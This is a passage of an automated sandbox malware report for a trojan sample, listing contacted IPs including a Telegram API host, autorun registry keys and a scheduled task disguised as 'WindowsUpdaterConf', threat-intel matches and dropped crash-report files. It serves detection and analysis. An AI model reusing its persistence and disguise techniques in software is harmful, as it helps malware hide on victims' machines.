                                                      https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.1809974233.0000000005958000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1866493773.0000000005DA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1941064108.0000000005688000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2027132554.00000000056F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.microsoft.copowershell.exe, 00000006.00000002.1802768273.0000000000DAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://contoso.com/Licensepowershell.exe, 00000014.00000002.2027132554.00000000056F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://contoso.com/Iconpowershell.exe, 00000014.00000002.2027132554.00000000056F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://upx.sf.netAmcache.hve.29.drfalse
                                                                		high
                                                                http://www.microsoft.(powershell.exe, 00000009.00000002.1875270222.00000000087C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefile.exe, 00000001.00000002.4176352782.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1803745466.00000000048F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1848689030.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1915480182.0000000004621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1996515359.0000000004691000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000014.00000002.1996515359.00000000047E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://crl.microsoft/powershell.exe, 0000000C.00000002.1964621290.0000000007F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    185.196.8.239
                                                                    		unknownSwitzerland
                                                                    		34888SIMPLECARRER2ITtrue
                                                                    208.95.112.1
                                                                    		ip-api.comUnited States
                                                                    		53334TUT-ASUSfalse
                                                                    149.154.167.220
                                                                    		api.telegram.orgUnited Kingdom
                                                                    		62041TELEGRAMRUfalse

                                                                    General Information

                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1569488
                                                                    Start date and time:2024-12-05 19:39:02 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 12m 21s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:44
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:file.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.evad.winEXE@39/52@2/3
                                                                    EGA Information:
                                                                    • Successful, ratio: 85.7%
                                                                    HCA Information:
                                                                    • Successful, ratio: 93%
                                                                    • Number of executed functions: 485
                                                                    • Number of non-executed functions: 44
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 20.42.65.92, 52.182.143.212, 52.168.117.173
                                                                    • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Execution Graph export aborted for target powershell.exe, PID 5928 because it is empty
                                                                    • Execution Graph export aborted for target powershell.exe, PID 6808 because it is empty
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                    • VT rate limit hit for: file.exe

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    13:39:55API Interceptor5827120x Sleep call for process: file.exe modified
                                                                    13:40:03API Interceptor53x Sleep call for process: powershell.exe modified
                                                                    13:40:33API Interceptor5x Sleep call for process: WindowsUpdaterConf.exe modified
                                                                    13:40:45API Interceptor7x Sleep call for process: WerFault.exe modified
                                                                    18:40:05AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 666999666 C:\Users\user\AppData\Roaming\file.exe
                                                                    18:40:14AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 666999666 C:\Users\user\AppData\Roaming\file.exe
                                                                    18:40:33Task SchedulerRun new task: WindowsUpdaterConf path: C:\Users\user\WindowsUpdaterConf.exe
                                                                    18:40:33AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdaterConf C:\Users\user\WindowsUpdaterConf.exe
                                                                    18:40:41AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdaterConf C:\Users\user\WindowsUpdaterConf.exe
                                                                    18:40:49AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdaterConf.lnk

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    185.196.8.239bot.x86_64.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                      bot.arm.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                        bot.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                          bot.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            bot.m68k.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                              bot.arm5.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                bot.sh4.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                  bot.ppc.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                    bot.mpsl.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                      bot.mips.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                        208.95.112.1Cooperative Agreement0000800380.docx.exeGet hashmaliciousBabadeda, Blank GrabberBrowse
                                                                                        • ip-api.com/json/?fields=225545
                                                                                        93z4kPX7B6.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                        • ip-api.com/line/?fields=hosting
                                                                                        https___files.catbox.moe_l2rczc.pif.exeGet hashmaliciousUnknownBrowse
                                                                                        • ip-api.com/json/?fields=225545
                                                                                        LxgGXCC4AL.exeGet hashmaliciousXWormBrowse
                                                                                        • ip-api.com/line/?fields=hosting
                                                                                        LMm6yxQtcf.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                        • ip-api.com/json/
                                                                                        aZPQ3mKZSa.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • ip-api.com/line/?fields=hosting
                                                                                        GZC0n65Ggl.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • ip-api.com/line/?fields=hosting
                                                                                        aU1TV97585.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • ip-api.com/line/?fields=hosting
                                                                                        mG93k6iBl4.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • ip-api.com/line/?fields=hosting
                                                                                        2zaGROpmo0.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • ip-api.com/line/?fields=hosting

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        ip-api.comCooperative Agreement0000800380.docx.exeGet hashmaliciousBabadeda, Blank GrabberBrowse
                                                                                        • 208.95.112.1
                                                                                        93z4kPX7B6.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                        • 208.95.112.1
                                                                                        https___files.catbox.moe_l2rczc.pif.exeGet hashmaliciousUnknownBrowse
                                                                                        • 208.95.112.1
                                                                                        LxgGXCC4AL.exeGet hashmaliciousXWormBrowse
                                                                                        • 208.95.112.1
                                                                                        LMm6yxQtcf.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                        • 208.95.112.1
                                                                                        aZPQ3mKZSa.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.95.112.1
                                                                                        GZC0n65Ggl.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.95.112.1
                                                                                        aU1TV97585.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.95.112.1
                                                                                        mG93k6iBl4.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.95.112.1
                                                                                        2zaGROpmo0.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • 208.95.112.1
                                                                                        api.telegram.orgozctQoBg1o.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        SPhzvjk8wx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        Q0Sh31btX8.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        o7H9XLUD9z.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        764GVLyJne.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        lQyRqxe4dt.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        G14yjXDQWf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        Ti5nuRV7y4.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        cavKcghGwI.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        8WLOyt9f86.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        TELEGRAMRUozctQoBg1o.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        SPhzvjk8wx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        Q0Sh31btX8.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        o7H9XLUD9z.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        764GVLyJne.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        lQyRqxe4dt.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        G14yjXDQWf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        Ti5nuRV7y4.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        cavKcghGwI.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        8WLOyt9f86.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        SIMPLECARRER2ITstail.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                        • 185.208.158.202
                                                                                        getlab.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                        • 185.208.158.202
                                                                                        chutmarao.ps1Get hashmaliciousRHADAMANTHYSBrowse
                                                                                        • 185.196.8.68
                                                                                        RjygH3Vh7O.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                        • 185.196.8.68
                                                                                        SekpL8Z26C.exeGet hashmaliciousUnknownBrowse
                                                                                        • 185.208.159.79
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • 185.208.159.79
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • 185.208.159.79
                                                                                        file.exeGet hashmaliciousNymaim, Socks5SystemzBrowse
                                                                                        • 185.208.158.202
                                                                                        http://itrack4.valuecommerce.ne.jp/cgi-bin/2366370/entry.php?vc_url=http://serviceoctopus.comGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 185.208.158.251
                                                                                        0a0#U00a0.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                        • 185.196.8.68
                                                                                        TUT-ASUSCooperative Agreement0000800380.docx.exeGet hashmaliciousBabadeda, Blank GrabberBrowse
                                                                                        • 208.95.112.1
                                                                                        93z4kPX7B6.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                        • 208.95.112.1
                                                                                        https___files.catbox.moe_l2rczc.pif.exeGet hashmaliciousUnknownBrowse
                                                                                        • 208.95.112.1
                                                                                        LxgGXCC4AL.exeGet hashmaliciousXWormBrowse
                                                                                        • 208.95.112.1
                                                                                        LMm6yxQtcf.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                        • 208.95.112.1
                                                                                        aZPQ3mKZSa.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.95.112.1
                                                                                        GZC0n65Ggl.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.95.112.1
                                                                                        aU1TV97585.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.95.112.1
                                                                                        mG93k6iBl4.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.95.112.1
                                                                                        2zaGROpmo0.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • 208.95.112.1

                                                                                        JA3 Fingerprints

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        3b5074b1b5d032e5620f69f9f700ff0eCooperative Agreement0000800380.docx.exeGet hashmaliciousBabadeda, Blank GrabberBrowse
                                                                                        • 149.154.167.220
                                                                                        ozctQoBg1o.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        SPhzvjk8wx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        Q0Sh31btX8.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        o7H9XLUD9z.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        764GVLyJne.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        lQyRqxe4dt.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        G14yjXDQWf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        Ti5nuRV7y4.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        cavKcghGwI.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220

                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_WindowsUpdaterCo_2713bfddc010d837993fc37b40d83573d89028b9_ecc25a9f_0107abb4-a8fa-41cf-a55b-64fcbc9d56ab\Report.wer

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.0425739531387612
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:mQFgnaxtHQJ5ZkcxLksLQXIDcQSc6f+cEdcw3H+BHUHZopAnQHdE7HeS9+xWAKTl:74MtO20cb+n6aSchhzuiFjZ24IO8dc
                                                                                        MD5:CC178E01E988DA051210DDDEC4B28F47
                                                                                        SHA1:ACE72E04433116E80FAC7B121A0CCC6C7D729AF8
                                                                                        SHA-256:0D375F7B2B23E5F34745FA80908F9151B6B6786300B717CC05CB5F36CFD69EC1
                                                                                        SHA-512:03A54ECB56C551191FCC90F076B0B50E5D3872F9F34C7F6FA9E85AC5A0D4B2F8765AC38D29D497424BB76054B0935A22A0E8B6B444A63BF119981D1709B9DC75
                                                                                        Malicious:false
                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.8.9.7.7.8.6.8.7.1.0.3.9.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.8.9.7.7.8.7.5.1.1.6.6.4.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.1.0.7.a.b.b.4.-.a.8.f.a.-.4.1.c.f.-.a.5.5.b.-.6.4.f.c.b.c.9.d.5.6.a.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.d.a.3.f.8.b.a.-.c.2.0.d.-.4.7.d.7.-.9.4.4.5.-.1.a.8.e.8.1.8.3.1.2.5.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.i.n.d.o.w.s.U.p.d.a.t.e.r.C.o.n.f...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.k.s.W.K.M.i.e.8.X.g.h.4.u.o.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.8.8.-.0.0.0.1.-.0.0.1.4.-.c.b.0.4.-.8.b.8.2.4.5.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.7.f.b.7.7.b.d.0.f.3.7.1.9.4.d.6.d.6.1.a.b.a.1.5.f.f.b.4.8.8.8.0.0.0.0.0.0.0.0.!.0.0.0.0.2.9.7.a.6.6.3.f.3.b.6.4.f.b.9.8.6.3.1.6.4.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_WindowsUpdaterCo_2713bfddc010d837993fc37b40d83573d89028b9_ecc25a9f_2cc00e63-2db3-4ebc-807e-9b6cf8994693\Report.wer

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.0488263975582648
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:pH+tO20cb+n6aGXL5TzuiFf9Z24IO8dc:Z+tscSn6a+JzuiFFY4IO8d
                                                                                        MD5:E7ACBDA576BB9CBE05D491FD3501BBEC
                                                                                        SHA1:34AFC308AAC78C78BBC86EB50D4B2C4561A696BE
                                                                                        SHA-256:3A232A61362D518BBCB1F9894D4B3D78B62AB35747582CF8F132F8F175694780
                                                                                        SHA-512:475122DBF68774C1C2AFFAE4897BE06A71ECF9B99BF48C46ADC3C9780E98B9F7A13E98D3690F159EC518226C0495094685B4826DA1DB8CDDE3D577B1CE5843EC
                                                                                        Malicious:false
                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.8.9.7.6.3.9.3.8.5.3.8.3.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.8.9.7.6.3.9.9.0.1.0.0.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.c.c.0.0.e.6.3.-.2.d.b.3.-.4.e.b.c.-.8.0.7.e.-.9.b.6.c.f.8.9.9.4.6.9.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.9.6.f.e.7.7.b.-.5.0.8.b.-.4.c.e.d.-.9.a.4.d.-.6.6.1.2.7.f.c.3.7.e.b.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.i.n.d.o.w.s.U.p.d.a.t.e.r.C.o.n.f...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.k.s.W.K.M.i.e.8.X.g.h.4.u.o.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.4.8.-.0.0.0.1.-.0.0.1.4.-.6.e.e.2.-.b.6.2.a.4.5.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.7.f.b.7.7.b.d.0.f.3.7.1.9.4.d.6.d.6.1.a.b.a.1.5.f.f.b.4.8.8.8.0.0.0.0.0.0.0.0.!.0.0.0.0.2.9.7.a.6.6.3.f.3.b.6.4.f.b.9.8.6.3.1.6.4.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_WindowsUpdaterCo_2713bfddc010d837993fc37b40d83573d89028b9_ecc25a9f_4128d7db-ca29-4c7c-b27a-638b6156a929\Report.wer

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.0425965202650278
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:x3O9y0O20cb+n6aichhzuiFf9Z24IO8dc:o9y0scSn6aRHzuiFFY4IO8d
                                                                                        MD5:9F4A319E9DFD7A7ED40B63DE332169B3
                                                                                        SHA1:B2DCB932E358F3CCEDD33145D1BF4965E2B5EEE6
                                                                                        SHA-256:0F7E8D08EA63F47A0E42AB05567CA80925FFF3426EC556D53EC23C77ACB62E8E
                                                                                        SHA-512:0D4D7336DFD16898468E4318F9FB97E9D140C7B6C4576DAB1285225D6AB30EEA985E9A0EE9D01BF103BC64C354F32C693134663E7F90BC81E432748475C1D2AA
                                                                                        Malicious:false
                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.8.9.7.6.4.7.5.1.3.2.7.6.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.8.9.7.6.4.8.2.6.3.2.7.3.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.1.2.8.d.7.d.b.-.c.a.2.9.-.4.c.7.c.-.b.2.7.a.-.6.3.8.b.6.1.5.6.a.9.2.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.0.c.4.d.c.1.3.-.8.9.c.6.-.4.7.2.e.-.8.9.7.a.-.7.b.b.a.f.0.4.0.f.6.6.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.i.n.d.o.w.s.U.p.d.a.t.e.r.C.o.n.f...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.k.s.W.K.M.i.e.8.X.g.h.4.u.o.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.2.8.-.0.0.0.1.-.0.0.1.4.-.e.a.0.e.-.8.c.2.f.4.5.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.7.f.b.7.7.b.d.0.f.3.7.1.9.4.d.6.d.6.1.a.b.a.1.5.f.f.b.4.8.8.8.0.0.0.0.0.0.0.0.!.0.0.0.0.2.9.7.a.6.6.3.f.3.b.6.4.f.b.9.8.6.3.1.6.4.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_WindowsUpdaterCo_2713bfddc010d837993fc37b40d83573d89028b9_ecc25a9f_43688d22-8a4d-4d54-b1e8-1756b234d657\Report.wer

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.0424401258828546
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:FkXFO20cb+n6a6chhzuiFf9Z24IO8dcr:SXFscSn6apHzuiFFY4IO8d
                                                                                        MD5:280279A758BF7156D0167C0D8463537F
                                                                                        SHA1:03AB2780E76A16DF51836749948510543AC9F32C
                                                                                        SHA-256:09B9F428BC03F2BFDB14158909585AD5CE17B1439EA60C30E7EFF2D82ACFD5DA
                                                                                        SHA-512:508474DB45C474916D4F2A5F3CA1AB42FFC027F345536736B808515D31DDAA2CD02E36BE0BF7C5FEED7268FF4317544BB7B4BE05D845C518A02757C36EAE3A67
                                                                                        Malicious:false
                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.8.9.7.6.5.6.1.4.0.7.3.1.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.8.9.7.6.5.7.7.0.3.2.3.1.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.3.6.8.8.d.2.2.-.8.a.4.d.-.4.d.5.4.-.b.1.e.8.-.1.7.5.6.b.2.3.4.d.6.5.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.a.9.a.0.b.9.f.-.6.b.9.4.-.4.4.e.6.-.a.8.0.6.-.b.c.c.e.6.d.5.c.3.9.2.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.i.n.d.o.w.s.U.p.d.a.t.e.r.C.o.n.f...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.k.s.W.K.M.i.e.8.X.g.h.4.u.o.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.c.8.-.0.0.0.1.-.0.0.1.4.-.c.e.0.2.-.8.f.3.4.4.5.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.7.f.b.7.7.b.d.0.f.3.7.1.9.4.d.6.d.6.1.a.b.a.1.5.f.f.b.4.8.8.8.0.0.0.0.0.0.0.0.!.0.0.0.0.2.9.7.a.6.6.3.f.3.b.6.4.f.b.9.8.6.3.1.6.4.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_WindowsUpdaterCo_2713bfddc010d837993fc37b40d83573d89028b9_ecc25a9f_45586236-1818-4904-9be7-c64612bee974\Report.wer

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
